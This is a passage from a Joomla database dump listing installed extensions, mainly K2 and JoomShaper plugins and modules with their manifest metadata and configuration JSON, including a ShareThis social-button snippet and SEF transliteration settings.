100\",\"itemImageS\":\"200\",\"itemImageM\":\"400\",\"itemImageL\":\"870\",\"itemImageXL\":\"900\",\"itemImageGeneric\":\"350\",\"catImageWidth\":\"100\",\"catImageDefault\":\"1\",\"userImageWidth\":\"100\",\"userImageDefault\":\"1\",\"commenterImgWidth\":\"48\",\"onlineImageEditor\":\"splashup\",\"imageTimestamp\":\"0\",\"imageMemoryLimit\":\"\",\"socialButtonCode\":\"<script type=\\\"text\\/javascript\\\" src=\\\"http:\\/\\/w.sharethis.com\\/button\\/buttons.js\\\"><\\/script>\\r\\n<script type=\\\"text\\/javascript\\\">stLight.options({publisher: \\\"ur-c64aa0b1-b15d-c411-f5fd-ee8e97f0f64d\\\"}); <\\/script>\\r\\n\\r\\n<div style=\\\"padding:20px 0\\\" class=\\\"social-share\\\">\\r\\n<span class=\'st_facebook_vcount\' displayText=\'Facebook\'><\\/span>\\r\\n<span class=\'st_twitter_vcount\' displayText=\'Tweet\'><\\/span>\\r\\n<span class=\'st_googleplus_vcount\' displayText=\'+1\'><\\/span>\\r\\n<span class=\'st_linkedin_vcount\' displayText=\'LinkedIn\'><\\/span>\\r\\n<span class=\'st_pinterest_vcount\' displayText=\'Pinterest\'><\\/span>\\r\\n<span class=\'st_email_vcount\' displayText=\'Email\'><\\/span>\\r\\n<span class=\'st_sharethis_vcount\' displayText=\'ShareThis\'><\\/span>\\r\\n<\\/div>\",\"twitterUsername\":\"\",\"facebookImage\":\"Medium\",\"comments\":\"1\",\"commentsOrdering\":\"DESC\",\"commentsLimit\":\"10\",\"commentsFormPosition\":\"below\",\"commentsPublishing\":\"1\",\"commentsReporting\":\"2\",\"commentsReportRecipient\":\"\",\"inlineCommentsModeration\":\"0\",\"gravatar\":\"1\",\"antispam\":\"0\",\"recaptchaForRegistered\":\"1\",\"akismetForRegistered\":\"1\",\"commentsFormNotes\":\"1\",\"commentsFormNotesText\":\"\",\"frontendEditing\":\"1\",\"showImageTab\":\"1\",\"showImageGalleryTab\":\"1\",\"showVideoTab\":\"1\",\"showExtraFieldsTab\":\"1\",\"showAttachmentsTab\":\"1\",\"showK2Plugins\":\"1\",\"sideBarDisplayFrontend\":\"0\",\"mergeEditors\":\"1\",\"sideBarDisplay\":\"1\",\"attachmentsFolder\":\"\",\"hideImportButton\":\"1\",\"googleSearch\":\"0\",\"googleSearchContainer\":\"k2GoogleSearchContainer\",\"K2UserProfile\":\"0\",\"redirect\":\"\",\"adminSearch\":\"simple\",\"cookieDomain\":\"\",\"taggingSystem\":\"1\",\"lockTags\":\"0\",\"showTagFilter\":\"0\",\"k2TagNorm\":\"0\",\"k2TagNormCase\":\"lower\",\"k2TagNormAdditionalReplacements\":\"\",\"recaptcha_public_key\":\"\",\"recaptcha_private_key\":\"\",\"recaptcha_theme\":\"clean\",\"recaptchaOnRegistration\":\"0\",\"akismetApiKey\":\"\",\"stopForumSpam\":\"0\",\"stopForumSpamApiKey\":\"\",\"showItemsCounterAdmin\":\"1\",\"showChildCatItems\":\"1\",\"disableCompactOrdering\":\"0\",\"metaDescLimit\":\"150\",\"enforceSEFReplacements\":\"0\",\"SEFReplacements\":\"\\u00c0|A, \\u00c1|A, \\u00c2|A, \\u00c3|A, \\u00c4|A, \\u00c5|A, \\u00e0|a, \\u00e1|a, \\u00e2|a, \\u00e3|a, \\u00e4|a, \\u00e5|a, \\u0100|A, \\u0101|a, \\u0102|A, \\u0103|a, \\u0104|A, \\u0105|a, \\u00c7|C, \\u00e7|c, \\u0106|C, \\u0107|c, \\u0108|C, \\u0109|c, \\u010a|C, \\u010b|c, \\u010c|C, \\u010d|c, \\u00d0|D, \\u00f0|d, \\u010e|D, \\u010f|d, \\u0110|D, \\u0111|d, \\u00c8|E, \\u00c9|E, \\u00ca|E, \\u00cb|E, \\u00e8|e, \\u00e9|e, \\u00ea|e, \\u00eb|e, \\u0112|E, \\u0113|e, \\u0114|E, \\u0115|e, \\u0116|E, \\u0117|e, \\u0118|E, \\u0119|e, \\u011a|E, \\u011b|e, \\u011c|G, \\u011d|g, \\u011e|G, \\u011f|g, \\u0120|G, \\u0121|g, \\u0122|G, \\u0123|g, \\u0124|H, \\u0125|h, \\u0126|H, \\u0127|h, \\u00cc|I, \\u00cd|I, \\u00ce|I, \\u00cf|I, \\u00ec|i, \\u00ed|i, \\u00ee|i, \\u00ef|i, \\u0128|I, \\u0129|i, \\u012a|I, \\u012b|i, \\u012c|I, \\u012d|i, \\u012e|I, \\u012f|i, \\u0130|I, \\u0131|i, \\u0134|J, \\u0135|j, \\u0136|K, \\u0137|k, \\u0138|k, \\u0139|L, \\u013a|l, \\u013b|L, \\u013c|l, \\u013d|L, \\u013e|l, \\u013f|L, \\u0140|l, \\u0141|L, \\u0142|l, \\u00d1|N, \\u00f1|n, \\u0143|N, \\u0144|n, \\u0145|N, \\u0146|n, \\u0147|N, \\u0148|n, \\u0149|n, \\u014a|N, \\u014b|n, \\u00d2|O, \\u00d3|O, \\u00d4|O, \\u00d5|O, \\u00d6|O, \\u00d8|O, \\u00f2|o, \\u00f3|o, \\u00f4|o, \\u00f5|o, \\u00f6|o, \\u00f8|o, \\u014c|O, \\u014d|o, \\u014e|O, \\u014f|o, \\u0150|O, \\u0151|o, \\u0154|R, \\u0155|r, \\u0156|R, \\u0157|r, \\u0158|R, \\u0159|r, \\u015a|S, \\u015b|s, \\u015c|S, \\u015d|s, \\u015e|S, \\u015f|s, \\u0160|S, \\u0161|s, \\u017f|s, \\u0162|T, \\u0163|t, \\u0164|T, \\u0165|t, \\u0166|T, \\u0167|t, \\u00d9|U, \\u00da|U, \\u00db|U, \\u00dc|U, \\u00f9|u, \\u00fa|u, \\u00fb|u, \\u00fc|u, \\u0168|U, \\u0169|u, \\u016a|U, \\u016b|u, \\u016c|U, \\u016d|u, \\u016e|U, \\u016f|u, \\u0170|U, \\u0171|u, \\u0172|U, \\u0173|u, \\u0174|W, \\u0175|w, \\u00dd|Y, \\u00fd|y, \\u00ff|y, \\u0176|Y, \\u0177|y, \\u0178|Y, \\u0179|Z, \\u017a|z, \\u017b|Z, \\u017c|z, \\u017d|Z, \\u017e|z, \\u03b1|a, \\u03b2|b, \\u03b3|g, \\u03b4|d, \\u03b5|e, \\u03b6|z, \\u03b7|h, \\u03b8|th, \\u03b9|i, \\u03ba|k, \\u03bb|l, \\u03bc|m, \\u03bd|n, \\u03be|x, \\u03bf|o, \\u03c0|p, \\u03c1|r, \\u03c3|s, \\u03c4|t, \\u03c5|y, \\u03c6|f, \\u03c7|ch, \\u03c8|ps, \\u03c9|w, \\u0391|A, \\u0392|B, \\u0393|G, \\u0394|D, \\u0395|E, \\u0396|Z, \\u0397|H, \\u0398|Th, \\u0399|I, \\u039a|K, \\u039b|L, \\u039c|M, \\u039e|X, \\u039f|O, \\u03a0|P, \\u03a1|R, \\u03a3|S, \\u03a4|T, \\u03a5|Y, \\u03a6|F, \\u03a7|Ch, \\u03a8|Ps, \\u03a9|W, \\u03ac|a, \\u03ad|e, \\u03ae|h, \\u03af|i, \\u03cc|o, \\u03cd|y, \\u03ce|w, \\u0386|A, \\u0388|E, \\u0389|H, \\u038a|I, \\u038c|O, \\u038e|Y, \\u038f|W, \\u03ca|i, \\u0390|i, \\u03cb|y, \\u03c2|s, \\u0410|A, \\u04d0|A, \\u04d2|A, \\u04d8|E, \\u04da|E, \\u04d4|E, \\u0411|B, \\u0412|V, \\u0413|G, \\u0490|G, \\u0403|G, \\u0492|G, \\u04f6|G, y|Y, \\u0414|D, \\u0415|E, \\u0400|E, \\u0401|YO, \\u04d6|E, \\u04bc|E, \\u04be|E, \\u0404|YE, \\u0416|ZH, \\u04c1|DZH, \\u0496|ZH, \\u04dc|DZH, \\u0417|Z, \\u0498|Z, \\u04de|DZ, \\u04e0|DZ, \\u0405|DZ, \\u0418|I, \\u040d|I, \\u04e4|I, \\u04e2|I, \\u0406|I, \\u0407|JI, \\u04c0|I, \\u0419|Y, \\u048a|Y, \\u0408|J, \\u041a|K, \\u049a|Q, \\u049e|Q, \\u04a0|K, \\u04c3|Q, \\u049c|K, \\u041b|L, \\u04c5|L, \\u0409|L, \\u041c|M, \\u04cd|M, \\u041d|N, \\u04c9|N, \\u04a2|N, \\u04c7|N, \\u04a4|N, \\u040a|N, \\u041e|O, \\u04e6|O, \\u04e8|O, \\u04ea|O, \\u04a8|O, \\u041f|P, \\u04a6|PF, \\u0420|P, \\u048e|P, \\u0421|S, \\u04aa|S, \\u0422|T, \\u04ac|TH, \\u040b|T, \\u040c|K, \\u0423|U, \\u040e|U, \\u04f2|U, \\u04f0|U, \\u04ee|U, \\u04ae|U, \\u04b0|U, \\u0424|F, \\u0425|H, \\u04b2|H, \\u04ba|H, \\u0426|TS, \\u04b4|TS, \\u0427|CH, \\u04f4|CH, \\u04b6|CH, \\u04cb|CH, \\u04b8|CH, \\u040f|DZ, \\u0428|SH, \\u0429|SHT, \\u042a|A, \\u042b|Y, \\u04f8|Y, \\u042c|Y, \\u048c|Y, \\u042d|E, \\u04ec|E, \\u042e|YU, \\u042f|YA, \\u0430|a, \\u04d1|a, \\u04d3|a, \\u04d9|e, \\u04db|e, \\u04d5|e, \\u0431|b, \\u0432|v, \\u0433|g, \\u0491|g, \\u0453|g, \\u0493|g, \\u04f7|g, y|y, \\u0434|d, \\u0435|e, \\u0450|e, \\u0451|yo, \\u04d7|e, \\u04bd|e, \\u04bf|e, \\u0454|ye, \\u0436|zh, \\u04c2|dzh, \\u0497|zh, \\u04dd|dzh, \\u0437|z, \\u0499|z, \\u04df|dz, \\u04e1|dz, \\u0455|dz, \\u0438|i, \\u045d|i, \\u04e5|i, \\u04e3|i, \\u0456|i, \\u0457|ji, \\u04c0|i, \\u0439|y, \\u048b|y, \\u0458|j, \\u043a|k, \\u049b|q, \\u049f|q, \\u04a1|k, \\u04c4|q, \\u049d|k, \\u043b|l, \\u04c6|l, \\u0459|l, \\u043c|m, \\u04ce|m, \\u043d|n, \\u04ca|n, \\u04a3|n, \\u04c8|n, \\u04a5|n, \\u045a|n, \\u043e|o, \\u04e7|o, \\u04e9|o, \\u04eb|o, \\u04a9|o, \\u043f|p, \\u04a7|pf, \\u0440|p, \\u048f|p, \\u0441|s, \\u04ab|s, \\u0442|t, \\u04ad|th, \\u045b|t, \\u045c|k, \\u0443|u, \\u045e|u, \\u04f3|u, \\u04f1|u, \\u04ef|u, \\u04af|u, \\u04b1|u, \\u0444|f, \\u0445|h, \\u04b3|h, \\u04bb|h, \\u0446|ts, \\u04b5|ts, \\u0447|ch, \\u04f5|ch, \\u04b7|ch, \\u04cc|ch, \\u04b9|ch, \\u045f|dz, \\u0448|sh, \\u0449|sht, \\u044a|a, \\u044b|y, \\u04f9|y, \\u044c|y, \\u048d|y, \\u044d|e, \\u04ed|e, \\u044e|yu, \\u044f|ya\",\"k2Sef\":\"0\",\"k2SefLabelCat\":\"content\",\"k2SefLabelTag\":\"tag\",\"k2SefLabelUser\":\"author\",\"k2SefLabelSearch\":\"search\",\"k2SefLabelDate\":\"date\",\"k2SefLabelItem\":\"0\",\"k2SefLabelItemCustomPrefix\":\"\",\"k2SefInsertItemId\":\"1\",\"k2SefItemIdTitleAliasSep\":\"dash\",\"k2SefUseItemTitleAlias\":\"1\",\"k2SefInsertCatId\":\"1\",\"k2SefCatIdTitleAliasSep\":\"dash\",\"k2SefUseCatTitleAlias\":\"1\",\"sh404SefLabelCat\":\"\",\"sh404SefLabelUser\":\"blog\",\"sh404SefLabelItem\":\"2\",\"sh404SefTitleAlias\":\"alias\",\"sh404SefModK2ContentFeedAlias\":\"feed\",\"sh404SefInsertItemId\":\"0\",\"sh404SefInsertUniqueItemId\":\"0\",\"cbIntegration\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10049,'plg_finder_k2','plugin','k2','finder',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_finder_k2\",\"type\":\"plugin\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"PLG_FINDER_K2_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10050,'Search - K2','plugin','k2','search',0,1,1,0,'{\"legacy\":false,\"name\":\"Search - K2\",\"type\":\"plugin\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"K2_THIS_PLUGIN_EXTENDS_THE_DEFAULT_JOOMLA_SEARCH_FUNCTIONALITY_TO_K2_CONTENT\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_tags\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10051,'System - K2','plugin','k2','system',0,1,1,0,'{\"legacy\":false,\"name\":\"System - K2\",\"type\":\"plugin\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"K2_THE_K2_SYSTEM_PLUGIN_IS_USED_TO_ASSIST_THE_PROPER_FUNCTIONALITY_OF_THE_K2_COMPONENT_SITE_WIDE_MAKE_SURE_ITS_ALWAYS_PUBLISHED_WHEN_THE_K2_COMPONENT_IS_INSTALLED\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10052,'User - K2','plugin','k2','user',0,1,1,0,'{\"legacy\":false,\"name\":\"User - K2\",\"type\":\"plugin\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"K2_A_USER_SYNCHRONIZATION_PLUGIN_FOR_K2\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10053,'Josetta - K2 Categories','plugin','k2category','josetta_ext',0,1,1,0,'{\"legacy\":false,\"name\":\"Josetta - K2 Categories\",\"type\":\"plugin\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10054,'Josetta - K2 Items','plugin','k2item','josetta_ext',0,1,1,0,'{\"legacy\":false,\"name\":\"Josetta - K2 Items\",\"type\":\"plugin\",\"creationDate\":\"June 7th, 2012\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10055,'K2 Comments','module','mod_k2_comments','',0,1,0,0,'{\"legacy\":false,\"name\":\"K2 Comments\",\"type\":\"module\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"MOD_K2_COMMENTS_DESCRIPTION\",\"group\":\"\"}','{\"moduleclass_sfx\":\"\",\"module_usage\":\"\",\"\":\"K2_TOP_COMMENTERS\",\"catfilter\":\"0\",\"category_id\":\"\",\"comments_limit\":\"5\",\"comments_word_limit\":\"10\",\"commenterName\":\"1\",\"commentAvatar\":\"1\",\"commentAvatarWidthSelect\":\"custom\",\"commentAvatarWidth\":\"50\",\"commentDate\":\"1\",\"commentDateFormat\":\"absolute\",\"commentLink\":\"1\",\"itemTitle\":\"1\",\"itemCategory\":\"1\",\"feed\":\"1\",\"commenters_limit\":\"5\",\"commenterNameOrUsername\":\"1\",\"commenterAvatar\":\"1\",\"commenterAvatarWidthSelect\":\"custom\",\"commenterAvatarWidth\":\"50\",\"commenterLink\":\"1\",\"commenterCommentsCounter\":\"1\",\"commenterLatestComment\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10056,'K2 Content','module','mod_k2_content','',0,1,0,0,'{\"legacy\":false,\"name\":\"K2 Content\",\"type\":\"module\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"K2_MOD_K2_CONTENT_DESCRIPTION\",\"group\":\"\"}','{\"moduleclass_sfx\":\"\",\"getTemplate\":\"Default\",\"source\":\"filter\",\"\":\"K2_OTHER_OPTIONS\",\"catfilter\":\"0\",\"category_id\":\"\",\"getChildren\":\"0\",\"itemCount\":\"5\",\"itemsOrdering\":\"\",\"FeaturedItems\":\"1\",\"popularityRange\":\"\",\"videosOnly\":\"0\",\"item\":\"\",\"items\":\"\",\"itemTitle\":\"1\",\"itemAuthor\":\"1\",\"itemAuthorAvatar\":\"1\",\"itemAuthorAvatarWidthSelect\":\"custom\",\"itemAuthorAvatarWidth\":\"50\",\"userDescription\":\"1\",\"itemIntroText\":\"1\",\"itemIntroTextWordLimit\":\"\",\"itemImage\":\"1\",\"itemImgSize\":\"Small\",\"itemVideo\":\"1\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemAttachments\":\"1\",\"itemTags\":\"1\",\"itemCategory\":\"1\",\"itemDateCreated\":\"1\",\"itemHits\":\"1\",\"itemReadMore\":\"1\",\"itemExtraFields\":\"0\",\"itemCommentsCounter\":\"1\",\"feed\":\"1\",\"itemPreText\":\"\",\"itemCustomLink\":\"0\",\"itemCustomLinkTitle\":\"\",\"itemCustomLinkURL\":\"http:\\/\\/\",\"itemCustomLinkMenuItem\":\"\",\"K2Plugins\":\"1\",\"JPlugins\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10057,'K2 Tools','module','mod_k2_tools','',0,1,0,0,'{\"legacy\":false,\"name\":\"K2 Tools\",\"type\":\"module\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"K2_TOOLS\",\"group\":\"\"}','{\"moduleclass_sfx\":\"\",\"module_usage\":\"0\",\"\":\"K2_CUSTOM_CODE_SETTINGS\",\"archiveItemsCounter\":\"1\",\"archiveCategory\":\"\",\"authors_module_category\":\"\",\"authorItemsCounter\":\"1\",\"authorAvatar\":\"1\",\"authorAvatarWidthSelect\":\"custom\",\"authorAvatarWidth\":\"50\",\"authorLatestItem\":\"1\",\"calendarCategory\":\"\",\"home\":\"\",\"seperator\":\"\",\"root_id\":\"\",\"end_level\":\"\",\"categoriesListOrdering\":\"\",\"categoriesListItemsCounter\":\"1\",\"root_id2\":\"\",\"catfilter\":\"0\",\"category_id\":\"\",\"getChildren\":\"0\",\"liveSearch\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"imagebutton\":\"\",\"button_text\":\"\",\"min_size\":\"75\",\"max_size\":\"300\",\"cloud_limit\":\"30\",\"cloud_category\":\"0\",\"cloud_category_recursive\":\"0\",\"customCode\":\"\",\"parsePhp\":\"0\",\"K2Plugins\":\"0\",\"JPlugins\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10058,'K2 Users','module','mod_k2_users','',0,1,0,0,'{\"legacy\":false,\"name\":\"K2 Users\",\"type\":\"module\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"K2_MOD_K2_USERS_DESCRTIPTION\",\"group\":\"\"}','{\"moduleclass_sfx\":\"\",\"getTemplate\":\"Default\",\"source\":\"0\",\"\":\"K2_DISPLAY_OPTIONS\",\"filter\":\"1\",\"K2UserGroup\":\"\",\"ordering\":\"1\",\"limit\":\"4\",\"userIDs\":\"\",\"userName\":\"1\",\"userAvatar\":\"1\",\"userAvatarWidthSelect\":\"custom\",\"userAvatarWidth\":\"50\",\"userDescription\":\"1\",\"userDescriptionWordLimit\":\"\",\"userURL\":\"1\",\"userEmail\":\"0\",\"userFeed\":\"1\",\"userItemCount\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10059,'K2 User','module','mod_k2_user','',0,1,0,0,'{\"legacy\":false,\"name\":\"K2 User\",\"type\":\"module\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"K2_MOD_K2_USER_DESCRIPTION\",\"group\":\"\"}','{\"moduleclass_sfx\":\"\",\"pretext\":\"\",\"\":\"K2_LOGIN_LOGOUT_REDIRECTION\",\"name\":\"1\",\"userAvatar\":\"1\",\"userAvatarWidthSelect\":\"custom\",\"userAvatarWidth\":\"50\",\"menu\":\"\",\"login\":\"\",\"logout\":\"\",\"usesecure\":\"0\",\"cache\":\"0\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10060,'K2 Quick Icons (admin)','module','mod_k2_quickicons','',1,1,2,0,'{\"legacy\":false,\"name\":\"K2 Quick Icons (admin)\",\"type\":\"module\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"K2_QUICKICONS_FOR_USE_IN_THE_JOOMLA_CONTROL_PANEL_DASHBOARD_PAGE\",\"group\":\"\"}','{\"modCSSStyling\":\"1\",\"modLogo\":\"1\",\"cache\":\"0\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10061,'K2 Stats (admin)','module','mod_k2_stats','',1,1,2,0,'{\"legacy\":false,\"name\":\"K2 Stats (admin)\",\"type\":\"module\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"K2_STATS_FOR_USE_IN_THE_K2_DASHBOARD_PAGE\",\"group\":\"\"}','{\"latestItems\":\"1\",\"popularItems\":\"1\",\"mostCommentedItems\":\"1\",\"latestComments\":\"1\",\"statistics\":\"1\",\"cache\":\"0\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10062,'News Show SP2','module','mod_news_show_sp2','',0,1,0,0,'{\"legacy\":false,\"name\":\"News Show SP2\",\"type\":\"module\",\"creationDate\":\"Feb 2012\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2013 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"2.2\",\"description\":\"JoomShaper News Display\\/Slider Module for 2.5\",\"group\":\"\"}','{\"uniqid\":\"\",\"content_source\":\"joomla\",\"catids\":\"\",\"k2catids\":\"all\",\"vmcat\":\"all\",\"vmordering\":\"latest\",\"ordering\":\"a.created\",\"ordering_direction\":\"ASC\",\"user_id\":\"0\",\"show_featured\":\"\",\"article_column\":\"1\",\"article_row\":\"1\",\"article_col_padding\":\"3px 3px 3px 3px\",\"article_showtitle\":\"1\",\"article_linkedtitle\":\"1\",\"article_title_text_limit\":\"1\",\"article_count_title_text\":\"0\",\"article_introtext\":\"1\",\"article_intro_text_limit\":\"0\",\"article_count_intro_text\":\"30\",\"article_date_format\":\"DATE_FORMAT_LC3\",\"article_show_author\":\"0\",\"article_show_category\":\"0\",\"article_linked_category\":\"1\",\"article_show_ratings\":\"0\",\"article_show_image\":\"1\",\"article_linked_image\":\"1\",\"article_image_pos\":\"bottom\",\"article_image_float\":\"float:left\",\"article_image_margin\":\"0 0 0 0\",\"article_thumb_width\":\"50\",\"article_thumb_height\":\"50\",\"article_thumb_ratio\":\"0\",\"article_extra_fields\":\"0\",\"article_show_more\":\"1\",\"article_more_text\":\"Read More...\",\"article_comments\":\"1\",\"article_hits\":\"1\",\"btn_like\":\"0\",\"btn_twitter\":\"0\",\"btn_gplus\":\"0\",\"art_show_price\":\"0\",\"art_show_cart_button\":\"0\",\"article_animation\":\"cover-horizontal-push\",\"article_slide_count\":\"2\",\"article_controllers_style\":\"nssp2-default\",\"article_pagination\":\"1\",\"article_arrows\":\"0\",\"article_autoplay\":\"1\",\"article_play_button\":\"0\",\"article_activator\":\"click\",\"article_animation_speed\":\"300\",\"article_animation_interval\":\"5000\",\"article_animation_transition\":\"linear\",\"links_block\":\"0\",\"links_count\":\"3\",\"links_col_padding\":\"3px 3px 3px 3px\",\"links_position\":\"bottom\",\"links_more\":\"1\",\"links_more_text\":\"MORE\",\"links_title_text_limit\":\"1\",\"links_title_count\":\"0\",\"links_show_intro\":\"0\",\"links_intro_text_limit\":\"0\",\"links_intro_count\":\"20\",\"links_show_image\":\"0\",\"links_linked_image\":\"1\",\"links_image_pos\":\"bottom\",\"links_image_float\":\"float:left\",\"links_image_margin\":\"0 0 0 0\",\"links_thumb_width\":\"50\",\"links_thumb_height\":\"50\",\"links_thumb_ratio\":\"0\",\"links_show_price\":\"0\",\"links_show_cart_button\":\"0\",\"links_animation\":\"cover-horizontal-push\",\"links_slide_count\":\"2\",\"links_controllers_style\":\"nssp2-default\",\"links_pagination\":\"1\",\"links_arrows\":\"0\",\"links_autoplay\":\"1\",\"links_play_button\":\"0\",\"links_activator\":\"click\",\"links_animation_speed\":\"300\",\"links_animation_interval\":\"5000\",\"links_animation_transition\":\"linear\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}','','',0,'0000-00-00 00:00:00',0,0),(10065,'SP Portfolio','module','mod_sp_portfolio','',0,1,0,0,'{\"legacy\":false,\"name\":\"SP Portfolio\",\"type\":\"module\",\"creationDate\":\"Jul 2013\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2013 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.1\",\"description\":\"Portfolio moudue for Joomla\",\"group\":\"\"}','{\"catid\":\"\",\"limit\":\"1\",\"column\":\"1\",\"ajaxlimit\":\"2\",\"orderby\":\"a.created\",\"ordering\":\"DESC\",\"show_featured\":\"\",\"module_layout\":\"\",\"show_title\":\"1\",\"linked_title\":\"1\",\"show_category\":\"1\",\"show_url\":\"1\",\"show_introtext\":\"1\",\"show_readmore\":\"1\",\"ajax_loader\":\"1\",\"show_filter\":\"1\",\"load_jquery\":\"1\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}','','',0,'0000-00-00 00:00:00',0,0),(10064,'Simple Image Gallery Module','module','mod_sp_simple_gallery','',0,1,0,0,'{\"legacy\":false,\"name\":\"Simple Image Gallery Module\",\"type\":\"module\",\"creationDate\":\"May 2010\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2013 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.JoomShaper.com\",\"version\":\"2.9.0\",\"description\":\"JoomShaper Simple Image Gallery Module - This module will show image gallery using SLIMBOX\",\"group\":\"\"}','{\"path\":\"\",\"thumbwidth\":\"100\",\"thumbheight\":\"100\",\"thumbratio\":\"1\",\"custom_css\":\"border:1px solid #DDD; margin:0 5px 10px 5px; padding:5px; background:#fff;\",\"js_framework\":\"mootools\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10070,'eshiol','library','eshiol','',0,1,1,0,'{\"legacy\":false,\"name\":\"eshiol\",\"type\":\"library\",\"creationDate\":\"February 2014\",\"author\":\"Helios Ciancio\",\"copyright\":\"(C) 2012-2014, Helios Ciancio. All rights 